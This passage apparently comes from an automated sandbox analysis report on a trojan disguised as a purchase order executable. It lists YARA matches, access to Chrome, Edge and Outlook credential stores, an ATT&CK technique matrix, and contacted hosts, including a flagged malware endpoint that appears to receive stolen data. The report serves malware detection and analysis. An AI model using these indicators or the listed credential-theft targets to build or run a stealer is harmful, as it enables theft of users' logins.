            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Users\user\Desktop\109__Purchase_Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            111
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Query Registry
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Security Software Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing
            DCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            109__Purchase_Order.exe39%ReversingLabsByteCode-MSIL.Trojan.FormBook
            109__Purchase_Order.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.tiro.com0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe
            https://scratchdreams.tk100%Avira URL Cloudmalware
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            us2.smtp.mailhostbox.com
            208.91.199.225
            truefalse
              high
              reallyfreegeoip.org
              172.67.177.134
              truefalse
                unknown
                scratchdreams.tk
                104.21.27.85
                truefalse
                  unknown
                  checkip.dyndns.com
                  193.122.6.168
                  truefalse
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      unknown
                      https://scratchdreams.tk/_send_.php?TSfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://reallyfreegeoip.org/xml/102.129.152.231false
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.com109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designersG109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThe109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://us2.smtp.mailhostbox.com109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/DataSet1.xsd109__Purchase_Order.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.com109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.org109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003140000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.goodfont.co.kr109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.coml109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.com109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netD109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlN109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cThe109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htm109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-user.html109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.org/q109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://scratchdreams.tk109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
